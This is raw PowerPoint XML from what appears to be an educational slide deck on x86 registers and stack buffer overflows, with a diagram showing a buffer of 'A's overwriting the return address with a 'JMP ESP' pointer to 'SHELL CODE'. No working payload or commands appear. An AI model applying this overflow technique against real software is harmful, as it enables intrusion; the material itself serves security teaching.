              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory Overview - Registers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5421A1A9-0A8F-4BFC-ACF7-D699E74599A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Dedicated, high rate of access storage locations for CPU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>“General Purpose” Registers: EAX, EBX, ECX, EDX, ESI, EDI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hold various pieces of data necessary to enact assembly instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Important Registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ESP – The Stack Pointer – Points to the “top” of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EIP – The Instruction Pointer – Contains the address of the next action to execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EBP – The Base Pointer – Points to the top of the stack when the executing function is called to help find the start of the active stack frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="757040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29A75E-3A2E-424C-894E-D07420554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BFA7967A-92B2-404B-ADC0-77B4357AB5FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflows – A Visual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(view in slideshow mode for animation)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A378E2E7-80D9-4C6B-B09D-66481460F570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8354716" y="1496759"/>
            <a:ext cx="2362200" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F8F9B"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>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STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Rectangle 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C71762A1-B3C6-484D-968C-B6413717787C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8354716" y="4518353"/>
            <a:ext cx="2362200" cy="331206"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B050"/>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JMP ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Rectangle 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E0F3F59-E9FC-4F4C-9718-37191696D339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8354716" y="2195762"/>
            <a:ext cx="2362200" cy="2329072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F34D47">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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E6B9CC-F3C5-49BA-A96D-7466E0E495B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8276284" y="1208169"/>
            <a:ext cx="24288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High memory (0xFFF…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D17AD58-2769-4AB4-9550-2FF739F033CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8276284" y="5723187"/>
            <a:ext cx="23166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Low memory (0x000…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rectangle 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3266F6BB-52D8-4ED4-99F8-DA69A0DAAB27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930610" y="1451676"/>
            <a:ext cx="2362200" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2F8F9B"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:sysClr val="window" lastClr="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>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STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rectangle 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C710A76F-F411-441B-807C-E92432216817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930610" y="1818906"/>
            <a:ext cx="2362200" cy="850697"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>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nsolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Prior Stack Frame now Active and Resumes @ Function Call</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="TextBox 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8354C51D-B2A9-4D0B-8277-76B8280F59B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="842858" y="1168920"/>
            <a:ext cx="24288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High memory (0xFFF…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13127477-931B-4D10-94A7-9DCF8DCBE88E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="842858" y="5687183"/>
            <a:ext cx="23166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nsolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Low memory (0x000…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="44" name="Group 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADADBBA2-9BA6-4510-A854-2F5857702083}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="931468" y="2669603"/>
            <a:ext cx="2362200" cy="2658001"/>
            <a:chOff x="8405818" y="2935788"/>
            <a:chExt cx="2362200" cy="2658001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Rectangle 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F44660C7-E18B-4D68-9BA3-613B14EFA388}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8405818" y="5262583"/>
              <a:ext cx="2362200" cy="331206"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00B050"/>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Return Address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AA6CC62-40CF-43E4-A5BC-36EDF76EDF35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8405818" y="2935788"/>
              <a:ext cx="2362200" cy="2329072"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F34D47">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Active Frame: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Data, Buffer, Parameters, etc.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="Group 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6409D317-E3F3-4A9F-B4D5-A9FB11DB0138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3343736" y="5148150"/>
            <a:ext cx="793178" cy="369332"/>
            <a:chOff x="10789454" y="4849198"/>
            <a:chExt cx="793178" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="TextBox 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75A2EACF-0A15-4564-B647-4D9E9AA5C6C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11018054" y="4849198"/>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a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Arrow: Chevron 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D07966A-2D3C-47C3-A53C-729D0D5AE648}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10789454" y="4878411"/>
              <a:ext cx="228600" cy="310905"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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ndara"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50" name="Group 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99542A4B-AAFC-4E3E-9A9D-F3047928F77A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3343907" y="2503474"/>
            <a:ext cx="793178" cy="369332"/>
            <a:chOff x="10789454" y="4849198"/>
            <a:chExt cx="793178" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="TextBox 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B8FF3A0-78FF-424E-8F33-6F2A76B2E53A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11018054" y="4849198"/>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a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Arrow: Chevron 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F3C5DBB-DC91-4117-8CA8-EAA737DDC454}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10789454" y="4878411"/>
              <a:ext cx="228600" cy="310905"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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ndara"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Rectangle 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BFC328A-37EC-4813-8238-2AAECC5986B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8354716" y="4839618"/>
            <a:ext cx="2362200" cy="910419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FA8F30">
              <a:lumMod val="75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SHELL CODE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="Group 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD95522E-B50F-4E97-AABC-A24BAF2A4AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10760560" y="1993487"/>
            <a:ext cx="793178" cy="369332"/>
            <a:chOff x="10789454" y="4849198"/>
            <a:chExt cx="793178" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="TextBox 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD12B7CF-7FAD-46D0-B8A6-E7C28BEE8134}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11018054" y="4849198"/>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a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>EIP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Arrow: Chevron 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3EB397-66E9-4518-B009-8881E1AEDEC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10789454" y="4878411"/>
              <a:ext cx="228600" cy="310905"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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ndara"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57" name="Group 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A8BB528-8E42-4538-989C-1643B4FD4CE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10760560" y="4671854"/>
            <a:ext cx="793178" cy="369332"/>
            <a:chOff x="10789454" y="4849198"/>
            <a:chExt cx="793178" cy="369332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="TextBox 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C8DA8A4-2F3C-45F6-AFD0-268B7A27DD7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11018054" y="4849198"/>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a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>ESP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Arrow: Chevron 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ECB5607-4FF1-40CD-8FFF-C9D1F48B2E79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="10789454" y="4878411"/>
              <a:ext cx="228600" cy="310905"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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ndara"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Arrow: Right 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4041EFC9-86DD-4D00-8CE9-BF0DE8DC0742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4711888" y="3322916"/>
            <a:ext cx="2484276" cy="888103"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="92D050">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61" name="TextBox 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4710DB51-0AF5-47CA-974E-9E105B52A026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5017909" y="3088689"/>
            <a:ext cx="14510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a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Rectangle 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0EAD449-C6A0-472A-88A4-38C0D2780B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="931468" y="1812150"/>
            <a:ext cx="2362200" cy="850697"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DDDDDD">
              <a:lumMod val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="254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nsolas"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Other Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379119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par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="4000" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="42"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="25" presetID="26" presetClass="emph" presetSubtype="0" repeatCount="4000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>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91667E-6 -4.81481E-6 L 2.91667E-6 0.33681 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="16829"/>
                                    </p:animMotion>
                                  </p:childTnLst>
